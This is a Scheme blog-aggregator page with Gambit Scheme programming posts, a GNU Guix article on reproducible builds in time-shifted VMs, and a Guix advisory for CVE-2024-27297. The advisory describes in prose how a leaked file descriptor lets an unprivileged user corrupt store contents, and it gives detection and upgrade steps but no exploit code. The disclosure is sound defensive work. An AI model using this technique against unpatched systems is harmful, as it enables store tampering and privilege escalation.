Planet Scheme

Monday, March 18, 2024

Phil Dawes

The point of macros

Pascal Costanza nails the point of macros.

(and illustrates why lispers actually like lisp's strange syntax so much)

Monday, March 18, 2024

And another new programming language

Last year I embarked on somewhat of a journey to find a better language for my home projects, after getting a bit frustrated by Python's lack of blocks and general cruftiness. After a couple of months of trying various different things I settled on Gambit Scheme for my spare-time data indexing project. A minimal core language with uniform syntax and macros. Lots of potential for adapting and building language features that make sense to me. Sorted.

Then last week I got round to reading Richard Jones's minimal Forth code: a language compiler and runtime in a couple of pages of well-documented x86 assembler, small enough to read and understand the whole system in a bus journey.

Like Scheme, Forth has the ability to construct new language features, allowing user code to get between the parser and the evaluator to modify the language itself. Also, like Scheme, it has a uniform syntax - words separated by spaces, which makes re-writing code on the fly practical. Both these features mean that a fully fledged programming environment can be bootstrapped up from a minimal core. And the hook is: that minimal core is so much smaller for Forth than it is for Scheme.

One thing led to another and I got interested in stack languages. Now I'm looking at Factor and wondering...

Factor ticks all the right boxes: minimal core, machine-code compiler, macros, continuations, lightweight threads and message-passing concurrency. It's also the tersest language I've seen - code to do something always seems a fraction of the size I expect it to be. On the other hand it's so radically different from anything else I've programmed in that it makes my head hurt. Could it be a contender to knock Scheme off the top spot?

Monday, March 18, 2024

Some hardcore Gambit-C features

Somebody asked me about Gambit-C the other day, and why I was using that as opposed to some other language or runtime for my own-time coding stuff. Despite the Scheme language being all cool, the thing that really made his eyes light up was the C features in Gambit (it is called Gambit-C for a reason). Here's some cool stuff you can do with Gambit:

  1. Scheme compiles to native machine code.
     The Gambit Scheme compiler compiles to C, which gcc then compiles to shared libraries or executables. The gsc command wraps this whole process, so you do a 'gsc <myschemefile>' which drops a shared library out of the other end. The (load) procedure in Gambit will import either interpreted Scheme code or compiled object files into the process, so you're good to go. In addition, the gsc compiler can also be run as an interactive interpreter (gsc -i), which acts just like the normal Gambit REPL interpreter except you also have access to the compiler from your code. E.g. as well as dropping interpreted Scheme code into the REPL, I can also compile a file and load it into the running REPL process without dropping to the command line - cool!
  2. You can embed C code directly into Gambit Scheme files.
     (c-include) lets you paste C code into your Scheme, and (c-lambda) lets you define lambdas in C. This is really sweet. I thought the Python C API was good, but because you have to write your C stuff in separate files it always requires some sort of make/build system, and that's always been just too much of a barrier for me to use it day-to-day. With Gambit you can just switch a few lines of C into your performance hotspot and you're good to go. This also gives you trivial access to C libraries and low-level stuff - e.g. I use it for mmapped files. Having the C in the same file as the Scheme means gcc can optimize and inline C code into compiled Scheme and vice versa. The other advantage of this approach is that the Gambit-C environment pretty much requires you to have a C compiler in the mix, so as a developer I can rely on it being there when distributing source to other developers, pasting code into emails, etc. (There's a small FFI sketch below.)
  3. You can compile and load C into a running Scheme process.
     Actually this is just a mix of (1) and (2), but it's really cool when you think about what's going on. Make an update to your C code and dynamically re-load it into your running process. I have an emacs keybinding which executes a 'cload' function in the repl:
    
    (define (cload f)
      (compile-file f)
      (load f))
    
    
    I.e. edit the C code, whack the button and it's in the repl process. This keeps the dev loop really tight even when writing C.
  4. You can compile the whole thing into a native binary.
     This is especially cool and important when you consider that Gambit-C isn't currently a popular runtime. It means you can distribute native binaries of your app for Windows and Mac users so that they can try your app without worrying about dependencies.

(*) N.B. Although uncommon outside the Lisp world, these compilation features are actually pretty common in Lisp/Scheme implementations. E.g. I think Chicken, Bigloo and SBCL provide similar things.
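
Here's a minimal sketch of what the embedded-C feature looks like in practice (my own illustration, not from the post, using Gambit's c-declare/c-lambda FFI forms; it needs to be compiled with gsc since the FFI is a compile-time feature):


(c-declare "#include <math.h>")

;; Bind the C library's sqrt as an ordinary Scheme procedure.
(define c-sqrt
  (c-lambda (double) double "sqrt"))

(display (c-sqrt 2.))   ; => 1.4142135623730951
(newline)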

Monday, March 18, 2024

Getting the hang of the lisp style

Finally, it's starting to feel like I'm getting the hang of the lisp style. The key for me seems to be in re-reading the contents of srfi-1 every time I think I need a loop.
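
For example (my own illustration, not from the post), the kind of accumulating loop I'd have written imperatively in Python becomes a fold from srfi-1 (how you pull srfi-1 in varies by implementation):


;; Sum of squares via srfi-1's fold instead of an explicit loop.
(define (sum-of-squares lst)
  (fold (lambda (x acc) (+ acc (* x x))) 0 lst))

(sum-of-squares '(1 2 3 4))   ; => 30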

Monday, March 18, 2024

Refactoring and the Repl

I'm still persevering with Gambit Scheme, and progressing pretty slowly, it has to be said. The first thing I've been missing is refactoring tools for Scheme.

I wrote the basic python refactoring functionality in bicyclerepairman a long while ago, and having it as part of my daily toolset has strongly influenced the way I program. For example, I tend to follow the 'bash out some code and then clean it up' style of development. In particular, I have a habit of naming variables and functions badly and then renaming them later as I code.

So my initial thought is: no problem - I'll just knock up a bicyclerepairman for scheme! The problem is that I'm not quite sure how to do automated refactoring with a repl. You see Python has no real repl culture (sure it has a repl, but nobody uses it except for trying out simple expressions). People tend to run their program/unittests from scratch each iteration, which means the entire environment gets re-evaluated on each run.

The challenge with running a repl while you develop is keeping it in sync with your refactored code: E.g. if I rename a function that's used in multiple places, that results in lots of code that needs re-evaluating. Can this be done automatically (e.g. could it be made to work by just re-eval'ing files?). Hmm.. I think I need to talk to somebody with a lot more scheme experience than I have. Unfortunately I don't actually know any experienced schemers, especially not in London or Birmingham; maybe somebody from lshift can help?

Monday, March 18, 2024

Scheme is love

I've been battling again with Scheme recently. Having spent the last couple of months playing with various languages, I've come to the conclusion that scheme is the only one that has any real possibility of becoming my next 'general purpose language'. Python held that crown for many years, but its lack of blocks and concurrency caused me to start looking elsewhere and now I'm spoilt.

So, to Scheme. I've not found another language that can offer:

  • functional programming
  • message-passing concurrency (see termite)
  • macros
  • continuations
  • terse syntax
  • hardly any language kludges

...and as somebody who programs for fun in his spare time, these things really do matter to me. The biggest obstacle to full enlightenment is the s-expression aesthetic: to my algol-shaped brain that lisp syntax just looks so damn ugly!

Anyway, I'm finding that the most enjoyable and self-affirming way to develop some scheme skills is (ironically) to re-read Peter Seibel's 'Practical Common Lisp' book with scheme glasses on. Now if there's anyone going to convince me that lisp syntax isn't just a grotty heap of parentheses, it's going to be Peter. His book just radiates lisp-love, and you can't help but be hooked. It says 'Look! You fools! Just look what you're missing!'. I've been translating various examples into scheme, just to test the water.

Monday, March 18, 2024

Scheme development environment

I recently had my work laptop nicked while I was in Paris, so I've had to reconstruct my Linux development environment on another laptop. That reminded me that I intended to document this stuff, since I had to dig around a bit for it when I first picked up Scheme a few months ago.

Things I use:

  • Gambit scheme
    The main reason I've stuck with this is termite, but I've also found the mailing list friendly and helpful (and full of much bigger brains than mine). Gambit can also compile static C binaries that run on Windows - that's important if you're going to write code in an esoteric environment like Scheme. It also has a decent FFI which allows you to embed C code in with the Scheme - tres cool, especially when you're writing performance-critical code.
  • Emacs
    You have to use this if you're doing lisp development. Personally I use emacs for development in any language, including Java. Steve Yegge wrote: "Emacs is to Eclipse as a light saber is to a blaster - but a blaster is a lot easier for anyone to pick up and use." Nuff said. I tend to have two frames open - one with the gambit repl in it and the other to do the actual coding. For people who aren't in the know, the lisp development experience is slightly different to most languages: you basically have a process running (called the REPL) and inject blocks of code into it. This makes the development cycle turnaround super-fast, and it becomes a bit frustrating when you go back to waiting for compile cycles in other languages. The various emacs scheme modes provide key presses for sending various regions of code to the repl, the most useful being the current definition (i.e. function) and the last expression.
  • Quack.el
    Quack has lots of features that make editing scheme much easier. My favourite is automatically converting the word 'lambda' into a single Greek lambda character (a la DrScheme). In addition to making the code smaller, having Greek letters all over the place makes me feel pretty hard-core (which is obviously very important).
  • E-tags
    Emacs tags isn't a patch on what bicyclerepairman provides when I'm writing python, but it does enough to make navigating code relatively hassle free, plus it works with every language you can think of. Basically it parses files and creates an index of all the definitions so that you can jump to the definition of a symbol and back in a single key chord.
  • GNU Info
    It's handy to have all the documentation in Info format because then you can use emacs to jump to the appropriate docs when you need them without having to switch to a browser, etc. E.g. this function maps [f1] to jump to the r5rs docs for whatever the cursor is currently pointing at (with thanks to Bill Clementson for this).
    (add-hook 'scheme-mode-hook
              (lambda ()
                (define-key scheme-mode-map [f1]
                  '(lambda ()
                     (interactive)
                     (ignore-errors
                       (let ((symbol (thing-at-point 'symbol)))
                         (info "(r5rs)")
                         (Info-index symbol)))))))
    
    (N.B. quack has a feature to auto-open web based docs into emacs while you're coding, but I work offline so much that I don't use this much)
  • A unit testing framework
    I didn't really get on with any of the ones I tried, so I wrote a simple DSL myself (took about half a day after I'd figured out how syntax-case macros work). Ideally I want to end up using something like Nat's Protest system, which chucks out documentation as a side effect of testing. A Scheme DSL should be a good fit for this style, since you can name tests using strings rather than having to document with function names. For the time being though it provides just enough to get me testing (and also served to teach me a few things about macros, which is good.)

Is there anything missing?

Monday, March 18, 2024

A poor man’s scheme profiler

Gambit Scheme lacks a profiler that can profile Scheme with embedded C code. (There's statprof, but unfortunately it doesn't profile embedded C.) I needed to do this pretty desperately for my triple indexing stuff, so I've written a simple macro which takes wall-clock timings of functions and accumulates them.

You replace 'define' with 'define-timed' in the functions you want profiled, and then the time spent in each function is accumulated in a global hash table. It's not pretty, but it's simple.

The macro needs some supporting code (which I keep in a separate module so that it can be compiled, in order to minimise overhead):


(define *timerhash* (make-table))

;;; call this before running the code
(define (reset-timer) (set! *timerhash* (make-table)))


;;; adds the time spent in the thunk to an entry in the hashtable
(define (accum-time name thunk)
  (let* ((timebefore (real-time))
         (res (thunk)))
    (table-set! *timerhash* name 
                (let ((current (table-ref *timerhash* name '(0 0))))
                  (list (+ (car current) (- (real-time) timebefore))
                        (+ (cadr current) 1))))
    res))

;;; call this afterwards to get the times
(define (get-times)
  (map (lambda (e) (list (first e)
                         (* 1000 (second e))
                         (third e)))
       (sort-list (table->list *timerhash*)
                  (lambda (a b) (> (second a) (second b))))))

And here's the macro. It basically just wraps the function body in a call to 'accum-time':


(define-syntax define-timed
  (syntax-rules ()
    ((define-timed (name . args) body ...)
     (define (name . args)
       (accum-time 'name (lambda ()
                           body ...))))))
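
To use it (a hypothetical example of mine, not from the post; 'fetch-row' and '*rows*' are made up, though 'run-query' does appear in the output below), you define the functions you care about with define-timed, run the workload, then call get-times:


(define-timed (fetch-row id)
  (table-ref *rows* id #f))

(reset-timer)
(run-query)       ; whatever exercises the code you're profiling
(pp (get-times))  ; => ((fetch-row 12.3 655) ...)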

Here's some example output. The first number is the accumulated milliseconds spent in the function, and the second is the number of times it was called.


((handle-query-clause 2182.3294162750244 8)
 (do-substring-search-query 1678.9898872375488 1)
 (run-query 1678.9379119873047 1)
 (main 1678.929090499878 1)
 (handle-substr-search 705.5349349975586 2)
 (convert-ids-to-symbols 400.3608226776123 1)
 (handle-s_o-clause 192.81506538391113 2)
 (lookup-o->s 192.52514839172363 2)
 (lookup-2-lvl-index 192.48294830322266 2)
 (join 163.8491153717041 8)
 (hash-join 163.6500358581543 5)
 (fetch-int32-results 118.37220191955566 655)
 (project 100.7072925567627 3)
 (concat 77.42834091186523 11793)
 (handle-p->so-clause 55.348873138427734 2)
 (bounds-matching-1intersect 51.54275894165039 2)
 (lookup-p->2-lvl-index 50.98700523376465 2)
 (search-32-32-index 42.65856742858887 94)
 (cells-at-positions 35.561561584472656 11697)
 (fetch-32-32-results 1.171112060546875 94)
 (extract-column .2582073211669922 4)
 (get-join-columns .05888938903808594 5)
 (text-search-to-structured-query .032901763916015625 1)
 (columns .0324249267578125 10)
 (column-position .031232833862304688 8)
 (rows .011920928955078125 4))

Hmmm... I really need to get something to HTML-pretty-print the Scheme code.

Monday, March 18, 2024

A simple scheme unittest DSL

One of the first things I wrote when I was in the 'nesting'* phase of learning Gambit Scheme was a unittest DSL. Part of this was that I wanted an excuse to use R5RS syntax-rules macros, but the real motivation was that I'd been seduced by the idea of using tests for documentation, a la Nat Pryce's 'Protest'. Here's what I came up with (example):


(define-tests bus-tests

  (drive-to-next-stop        ; name of fn/class/symbol being tested
    ("takes bus to next stop"
      (drive-to-next-stop bus)
      (assert-equal 'next-stop (bus 'position)))
    ("doesn't stop off at chipshop on the way"
      ; test code to detect chipshop hasn't been stopped at
      ))

  (pick-up-passengers
    ("picks up passengers from the bus stop"
      test code )
    ("doesn't leave passengers at the stop"
      test code )
    ("waits for old lady running to the stop"
      test code )))

The point is that it's easy to write some lisp to traverse this code and generate documentation from it.
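
Here's a rough sketch of that idea (mine, not the actual implementation): treat the define-tests form as data and print the descriptions as a documentation outline:


;; Walk a quoted (define-tests name (subject ("description" body ...) ...) ...)
;; form and print each subject with its test descriptions.
(define (print-test-docs form)
  (for-each
   (lambda (group)
     (display (car group)) (newline)           ; the fn/class/symbol under test
     (for-each (lambda (test)
                 (display "  - ")
                 (display (car test)) (newline))
               (cdr group)))
   (cddr form)))

;; (print-test-docs '(define-tests bus-tests (drive-to-next-stop ("takes bus to next stop" #f))))
;; => prints "drive-to-next-stop" followed by "  - takes bus to next stop"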

I found when using Protest in Python that the documentation angle reinforced some healthy habits: when you write tests you naturally think 'how would this look to another person?' and 'how can I document the behaviour of this?', which encourages more complete testing. Also, when you look at the generated documentation it's easy to see which bits you aren't testing because the documentation is missing (which then encourages you to write more tests).

The implementation is a bit clunky and makes use of gambit exceptions as a way of terminating tests early on assert failures (which is a bit rubbish). What probably should be happening is that the outer macro should rewrite each assert as an 'if' or something, to conditionally execute the rest of the test (which would be portable to other Scheme implementations). To be honest I knocked this up as fast as I could so that I could move on to writing other things (I'm developing a data aggregation and indexing tool), but the point of this post is more to convey the idea than the implementation.
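
To make the rewriting idea concrete, here's a rough sketch (mine, not the linked implementation): an assert that expands into a plain if, reports the failure and returns #f, so a runner can chain asserts with and instead of relying on exceptions:


(define-syntax assert-equal
  (syntax-rules ()
    ((_ expected expr)
     (let ((want expected)
           (actual expr))
       (if (equal? want actual)
           #t
           (begin
             (display "FAIL: ") (write 'expr)
             (display " expected ") (write want)
             (display " but got ") (write actual) (newline)
             #f))))))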

That said, the crufty (currently gambit specific) implementation is here - hope this is interesting/useful to somebody.

* nesting as in 'building a nest'

Monday, March 18, 2024

Gambit-C namespaces

One of the first issues I had when evaluating scheme as a possible replacement for Python as my hobby language was its apparent lack of module/library/namespace system. How do people possibly build big programs? I wondered.

Now it turns out most (all?) scheme implementations have features to deal with modules and libraries. Gambit's is particularly nebulous in that it doesn't appear to be documented anywhere. Anyway, here's how it appears to work. I'm sure somebody will correct me if I've got something wrong:

Gambit has the 'namespace' primitive, with which you can declare that certain definitions belong in certain namespaces. Here's an example:


> (namespace ("f#" foo) ("b#" bar baz))

This means (AFAICS): "any further use/definition of the term 'foo' will reference the f# namespace and any use of bar/baz will reference the b# namespace".

e.g.


> (namespace ("f#" foo) ("b#" bar baz))

> (define (foo) "I am foo")  ; defines f#foo

> (foo)
"I am foo"

> (f#foo)
"I am foo"

> (define (bar) "I am bar")

> (b#bar)
"I am bar"

This is cool because it allows you to retroactively fit namespaces to scheme code loaded from other files. E.g. If mod1.scm and mod2.scm both defined a procedure 'foo', you could use namespaces to allow both to be used in the same environment thus:


> (namespace ("m1#" foo))
> (load "mod1")    ; contains: (define (foo) "I am mod1's foo")

> (namespace ("m2#" foo))
> (load "mod2")    ; contains: (define (foo) "I am mod2's foo")

> (m1#foo)
"I am mod1's foo"

> (m2#foo)
"I am mod2's foo"

Job done. Now, I haven't really used gambit namespaces much, so I'm not in a position to provide a good comparison with other approaches; however, the feature does seem in keeping with the rest of the scheme language. By that I mean rather than a large set of fully-blown rich language features, you get a small bunch of simple but very extensible primitives with which to build your own language.

A good example of building a big system over these small primitives is Christian Jaeger's chjmodule library, where he has used namespaces along with 'load' and 'compile-file' (and of course macros) to build a more industrial-strength module system. This includes an 'import' keyword that loads from a search path and a procedure to recursively compile and import modules. Some example code from the README:



$ gsc -i -e '(load "chjmodule")' -

> (import 'srfi-1)
> fold
#
> (fold + 0 '(1 2 3))
6
> (build-recursively/import 'regex-case)
            ; recompiles regex.scm (a dependency) if necessary,
            ; then (re)compiles regex-case.scm if necessary and imports it.
> (regex-case "http://www.xxx.yy" ("http://(.+)" (_ url) url) (else url))
"www.xxx.yy"
> *module-search-path* 
("."
 "mod"
 "gambit"
 "~/gambit"
 "~~"
 "..")

Sweet. I'm guessing it'll also be possible to build the r6rs library syntax in gambit scheme the same way.

Monday, March 18, 2024

Wednesday, March 13, 2024

GNU Guix

Adventures on the quest for long-term reproducible deployment

Rebuilding software five years later, how hard can it be? It can’t be that hard, especially when you pride yourself on having a tool that can travel in time and that does a good job at ensuring reproducible builds, right?

In hindsight, we can tell you: it’s more challenging than it seems. Users attempting to travel 5 years back with guix time-machine are (or were) unavoidably going to hit bumps on the road—a real problem because that’s one of the use cases Guix aims to support well, in particular in a reproducible research context.

In this post, we look at some of the challenges we face while traveling back, how we are overcoming them, and open issues.

The vision

First of all, one clarification: Guix aims to support time travel, but we’re talking of a time scale measured in years, not in decades. We know all too well that this is already very ambitious—it’s something that probably nobody except Nix and Guix are even trying. More importantly, software deployment at the scale of decades calls for very different, more radical techniques; it’s the work of archivists.

Concretely, Guix 1.0.0 was released in 2019 and our goal is to allow users to travel as far back as 1.0.0 and redeploy software from there, as in this example:

$ guix time-machine -q --commit=v1.0.0 -- \
     environment --ad-hoc python2 -- python
> guile: warning: failed to install locale
Python 2.7.15 (default, Jan  1 1970, 00:00:01) 
[GCC 5.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

(The command above uses guix environment, the predecessor of guix shell, which didn’t exist back then.) It’s only 5 years ago but it’s pretty much remote history on the scale of software evolution—in this case, that history comprises major changes in Guix itself and in Guile. How well does such a command work? Well, it depends.

The project has two build farms; bordeaux.guix.gnu.org has been keeping substitutes (pre-built binaries) of everything it built since roughly 2021, while ci.guix.gnu.org keeps substitutes for roughly two years, but there is currently no guarantee on the duration substitutes may be retained. Time traveling to a period where substitutes are available is fine: you end up downloading lots of binaries, but that’s OK, you rather quickly have your software environment at hand.

Bumps on the build road

Things get more complicated when targeting a period in time for which substitutes are no longer available, as was the case for v1.0.0 above. (And really, we should assume that substitutes won’t remain available forever: fellow NixOS hackers recently had to seriously consider trimming their 20-year-long history of substitutes because the costs are not sustainable.)

Apart from the long build times, the first problem that arises in the absence of substitutes is source code unavailability. I’ll spare you the details for this post—that problem alone would deserve a book. Suffice to say that we’re lucky that we started working on integrating Guix with Software Heritage years ago, and that there has been great progress over the last couple of years to get closer to full package source code archival (more precisely: 94% of the source code of packages available in Guix in January 2024 is archived, versus 72% of the packages available in May 2019).

So what happens when you run the time-machine command above? It brings you to May 2019, a time for which none of the official build farms had substitutes until a few days ago. Ideally, thanks to isolated build environments, you’d build things for hours or days, and in the end all those binaries will be here just as they were 5 years ago. In practice though, there are several problems that isolation as currently implemented does not address.

Screenshot of movie “Safety Last!” with Harold Lloyd hanging from a clock on a building’s façade.

Among those, the most frequent problem is time traps: software build processes that fail after a certain date (these are also referred to as “time bombs” but we’ve had enough of these and would rather call for a ceasefire). This plagues a handful of packages out of almost 30,000 but unfortunately we’re talking about packages deep in the dependency graph. Here are some examples:

  • OpenSSL unit tests fail after a certain date because some of the X.509 certificates they use have expired.
  • GnuTLS had similar issues; newer versions rely on datefudge to fake the date while running the tests and thus avoid that problem altogether.
  • Python 2.7, found in Guix 1.0.0, also had that problem with its TLS-related tests.
  • OpenJDK would fail to build at some point with this interesting message: Error: time is more than 10 years from present: 1388527200000 (the build system would consider that its data about currencies is likely outdated after 10 years).
  • Libgit2, a dependency of Guix, had (has?) time-dependent tests.
  • MariaDB tests started failing in 2019.

Someone traveling to v1.0.0 will hit several of these, preventing guix time-machine from completing. A serious bummer, especially to those who’ve come to Guix from the perspective of making their research workflow reproducible.

Time traps are the main road block, but there’s more! In rare cases, there’s software influenced by kernel details not controlled by the build daemon:

In a handful of cases, but important ones, builds might fail when performed on certain CPUs. We’re aware of at least two cases:

Neither time traps nor those obscure hardware-related issues can be avoided with the isolation mechanism currently used by the build daemon. This harms time traveling when substitutes are unavailable. Giving up is not in the ethos of this project though.

Where to go from here?

There are really two open questions here:

  1. How can we tell which packages need to be “fixed”, and how: building at a specific date, on a specific CPU?
  2. How can we keep those aspects of the build environment (time, CPU variant) under control?

Let’s start with #2. Before looking for a solution, it’s worth remembering where we come from. The build daemon runs build processes with a separate root file system, under dedicated user IDs, and in separate Linux namespaces, thereby minimizing interference with the rest of the system and ensuring a well-defined build environment. This technique was implemented by Eelco Dolstra for Nix in 2007 (with namespace support added in 2012), at a time where the word container had to do with boats and before “Docker” became the name of a software tool. In short, the approach consists in controlling the build environment in every detail (it’s at odds with the strategy that consists in achieving reproducible builds in spite of high build environment variability). That these are mere processes with a bunch of bind mounts makes this approach inexpensive and appealing.

Realizing we’d also want to control the build environment’s date, we naturally turn to Linux namespaces to address that—Dolstra, Löh, and Pierron already suggested something along these lines in the conclusion of their 2010 Journal of Functional Programming paper. Turns out there is now a time namespace. Unfortunately it’s limited to CLOCK_MONOTONIC and CLOCK_BOOTTIME clocks; the manual page states:

Note that time namespaces do not virtualize the CLOCK_REALTIME clock. Virtualization of this clock was avoided for reasons of complexity and overhead within the kernel.

I hear you say: What about datefudge and libfaketime? These rely on the LD_PRELOAD environment variable to trick the dynamic linker into pre-loading a library that provides symbols such as gettimeofday and clock_gettime. This is a fine approach in some cases, but it’s too fragile and too intrusive when targeting arbitrary build processes.

That leaves us with essentially one viable option: virtual machines (VMs). The full-system QEMU lets you specify the initial real-time clock of the VM with the -rtc flag, which is exactly what we need (“user-land” QEMU such as qemu-x86_64 does not support it). And of course, it lets you specify the CPU model to emulate.

News from the past

Now, the question is: where does the VM fit? The author considered writing a package transformation that would change a package such that it’s built in a well-defined VM. However, that wouldn’t really help: this option didn’t exist in past revisions, and it would lead to a different build anyway from the perspective of the daemon—a different derivation.

The best strategy appeared to be offloading: the build daemon can offload builds to different machines over SSH, we just need to let it send builds to a suitably-configured VM. To do that, we can reuse some of the machinery initially developed for childhurds that takes care of setting up offloading to the VM: creating substitute signing keys and SSH keys, exchanging secret key material between the host and the guest, and so on.

The end result is a service for Guix System users that can be configured in a few lines:

(use-modules (gnu services virtualization))

(operating-system
  ;; …
  (services (append (list (service virtual-build-machine-service-type))
                    %base-services)))

The default setting above provides a 4-core VM whose initial date is January 2020, emulating a Skylake CPU from that time—the right setup for someone willing to reproduce old binaries. You can check the configuration like this:

$ sudo herd configuration build-vm
CPU: Skylake-Client
number of CPU cores: 4
memory size: 2048 MiB
initial date: Wed Jan 01 00:00:00Z 2020

To enable offloading to that VM, one has to explicitly start it, like so:

$ sudo herd start build-vm

From there on, every native build is offloaded to the VM. The key part is that with almost no configuration, you get everything set up to build packages “in the past”. It’s a Guix System only solution; if you run Guix on another distro, you can set up a similar build VM but you’ll have to go through the cumbersome process that is all taken care of automatically here.

Of course it’s possible to choose different configuration parameters:

(service virtual-build-machine-service-type
         (virtual-build-machine
          (date (make-date 0 0 00 00 01 10 2017 0)) ;further back in time
          (cpu "Westmere")
          (cpu-count 16)
          (memory-size (* 8 1024))
          (auto-start? #t)))

With a build VM with its date set to January 2020, we have been able to rebuild Guix and its dependencies along with a bunch of packages such as emacs-minimal from v1.0.0, overcoming all the time traps and other challenges described earlier. As a side effect, substitutes are now available from ci.guix.gnu.org so you can even try this at home without having to rebuild the world:

$ guix time-machine -q --commit=v1.0.0 -- build emacs-minimal --dry-run
guile: warning: failed to install locale
substitute: updating substitutes from 'https://ci.guix.gnu.org'... 100.0%
38.5 MB would be downloaded:
   /gnu/store/53dnj0gmy5qxa4cbqpzq0fl2gcg55jpk-emacs-minimal-26.2

For the fun of it, we went as far as v0.16.0, released in December 2018:

guix time-machine -q --commit=v0.16.0 -- \
  environment --ad-hoc vim -- vim --version

This is the furthest we can go since channels and the underlying mechanisms that make time travel possible did not exist before that date.

There’s one “interesting” case we stumbled upon in that process: in OpenSSL 1.1.1g (released April 2020 and packaged in December 2020), some of the test certificates are not valid before April 2020, so the build VM needs to have its clock set to May 2020 or thereabouts. Booting the build VM with a different date can be done without reconfiguring the system:

$ sudo herd stop build-vm
$ sudo herd start build-vm -- -rtc base=2020-05-01T00:00:00

The -rtc … flags are passed straight to QEMU, which is handy when exploring workarounds…

The time-travel continuous integration jobset has been set up to check that we can, at any time, travel back to one of the past releases. This at least ensures that Guix itself and its dependencies have substitutes available at ci.guix.gnu.org.

Reproducible research workflows reproduced

Incidentally, this effort rebuilding 5-year-old packages has allowed us to fix embarrassing problems. Software that accompanies research papers that followed our reproducibility guidelines could no longer be deployed, at least not without this clock twiddling effort:

It’s good news that we can now re-deploy these 5-year-old software environments with minimum hassle; it’s bad news that holding this promise took extra effort.

The ability to reproduce the environment of software that accompanies research work should not be considered a mundanity or an exercise that’s “overkill”. The ability to rerun, inspect, and modify software are the natural extension of the scientific method. Without a companion reproducible software environment, research papers are merely the advertisement of scholarship, to paraphrase Jon Claerbout.

The future

The astute reader surely noticed that we didn’t answer question #1 above:

How can we tell which packages need to be “fixed”, and how: building at a specific date, on a specific CPU?

It’s a fact that Guix so far lacks information about the date, kernel, or CPU model that should be used to build a given package. Derivations purposefully lack that information on the grounds that it cannot be enforced in user land and is rarely necessary—which is true, but “rarely” is not the same as “never”, as we saw. Should we create a catalog of date, CPU, and/or kernel annotations for packages found in past revisions? Should we define, for the long-term, an all-encompassing derivation format? If we did and effectively required virtual build machines, what would that mean from a bootstrapping standpoint?

Here’s another option: build packages in VMs running in the year 2100, say, and on a baseline CPU. We don’t need to require all users to set up a virtual build machine—that would be impractical. It may be enough to set up the project build farms so they build everything that way. This would allow us to catch time traps and year 2038 bugs before they bite.

Before we can do that, the virtual-build-machine service needs to be optimized. Right now, offloading to build VMs is as heavyweight as offloading to a separate physical build machine: data is transferred back and forth over SSH over TCP/IP. The first step will be to run SSH over a paravirtualized transport instead such as AF_VSOCK sockets. Another avenue would be to make /gnu/store in the guest VM an overlay over the host store so that inputs do not need to be transferred and copied.

Until then, happy software (re)deployment!

Acknowledgments

Thanks to Simon Tournier for insightful comments on a previous version of this post.

by Ludovic Courtès at Wednesday, March 13, 2024

Tuesday, March 12, 2024

GNU Guix

Fixed-Output Derivation Sandbox Bypass (CVE-2024-27297)

A security issue has been identified in guix-daemon which allows for fixed-output derivations, such as source code tarballs or Git checkouts, to be corrupted by an unprivileged user. This could also lead to local privilege escalation. This was originally reported to Nix but also affects Guix as we share some underlying code from an older version of Nix for the guix-daemon. Readers only interested in making sure their Guix is up to date and no longer affected by this vulnerability can skip down to the "Upgrading" section.

Vulnerability

The basic idea of the attack is to pass file descriptors through Unix sockets to allow another process to modify the derivation contents. This was first reported to Nix by jade and puckipedia with further details and a proof of concept here. Note that the proof of concept is written for Nix and has been adapted for GNU Guix below. This security advisory is registered as CVE-2024-27297 (details are also available at Nix's GitHub security advisory) and rated "moderate" in severity.

A fixed-output derivation is one where the output hash is known in advance, for instance one that produces a source tarball. The GNU Guix build sandbox purposefully excludes network access (for security and to ensure we can control and reproduce the build environment), but a fixed-output derivation does have network access, for instance to download that source tarball. However, as stated, the hash of the output must be known in advance, again for security (we know if the file contents would change) and reproducibility (it should always have the same output). The guix-daemon handles the build process and writing the output to the store, as a privileged process.
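
For readers unfamiliar with the term, here is roughly what a fixed-output source download looks like in a package definition (an illustrative sketch only; the URL and hash below are placeholders, not a real package):


(origin
  (method url-fetch)
  (uri "https://example.org/foo-1.0.tar.gz")
  (sha256
   (base32
    "0000000000000000000000000000000000000000000000000000")))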

In the build sandbox for a fixed-output derivation, a file descriptor to its contents could be shared with another process via a Unix socket. This other process, outside of the build sandbox, can then modify the contents written to the store, changing them to something malicious or otherwise corrupting the output. While the output hash has already been determined, these changes would mean a fixed-output derivation could have contents written to the store which do not match the expected hash. This could then be used by the user or other packages as well.

Mitigation

This security issue (tracked here for GNU Guix) has been fixed by two commits by Ludovic Courtès. Users should make sure they have updated to this second commit to be protected from this vulnerability. Upgrade instructions are in the following section.

While several possible mitigation strategies were detailed in the original report, the simplest fix is to just copy the derivation output somewhere else, deleting the original, before writing to the store. Any file descriptors will no longer point to the contents which get written to the store, so only the guix-daemon should be able to write to the store, as designed. This is what the Nix project used in their own fix. This does add an additional copy/delete for each file, which may add a performance penalty for derivations with many files.
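
Conceptually, the fix amounts to something like this (a sketch in Scheme of the idea only; the actual guix-daemon code is C++, and these procedure and path names are made up):


(define (register-output! build-output store-path)
  ;; Copy to a fresh file first: any descriptor the builder leaked via
  ;; SCM_RIGHTS still points at the old inode, not at what gets registered.
  (let ((fresh (string-append store-path ".tmp")))
    (copy-file build-output fresh)
    (delete-file build-output)
    (rename-file fresh store-path)))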

A proof of concept by Ludovic, adapted from the one in the original Nix report, is available at the end of this post. One can run this code with

guix build -f fixed-output-derivation-corruption.scm -M4

This will output whether the current guix-daemon being used is vulnerable or not. If it is vulnerable, the output will include a line similar to

We managed to corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261, meaning that YOUR SYSTEM IS VULNERABLE!

The corrupted file can be removed with

guix gc -D /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd*

In general, corrupt files from the store can be found with

guix gc --verify=contents

which will also include any files corrupted through this vulnerability. Do note that this command can take a long time to complete as it checks every file under /gnu/store, which likely has many files.

Upgrading

Due to the severity of this security advisory, we strongly recommend all users to upgrade their guix-daemon immediately.

For a Guix System the procedure is just reconfiguring the system after a guix pull, either restarting guix-daemon or rebooting. For example,

guix pull
sudo guix system reconfigure /run/current-system/configuration.scm
sudo herd restart guix-daemon

where /run/current-system/configuration.scm is the current system configuration but could, of course, be replaced by a system configuration file of a user's choice.

For Guix running as a package manager on other distributions, one needs to guix pull with sudo, as the guix-daemon runs as root, and restart the guix-daemon service. For example, on a system using systemd to manage services,

sudo --login guix pull
sudo systemctl restart guix-daemon.service

